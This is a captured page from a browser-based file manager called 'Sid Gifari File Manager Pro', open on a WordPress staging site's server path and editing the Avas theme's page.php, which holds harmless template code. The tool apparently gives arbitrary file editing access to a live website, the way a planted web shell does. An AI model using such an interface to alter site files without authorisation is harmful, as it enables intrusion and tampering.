🔐 Sid Gifari File Manager Pro
v8.0.5 | 2026-08-05 22:35:51 | PHP 8.2.32
📂
/ (Root)
/
home
/
eliteewa
/
staging.eliteewallet.com
/
wp-content
/
themes
/
avas
📍 /home/eliteewa/staging.eliteewallet.com/wp-content/themes/avas
🔄 Refresh
✏️
Editing: page.php
Writable
<?php /** * * @package tx * @author theme-x * @link https://theme-x.org/ *=========================== * Default Page template *=========================== */ get_header(); ?> <div class="container space-content"> <?php tx_content_page(); ?> </div> <?php get_footer();
💾 Save Changes
❌ Cancel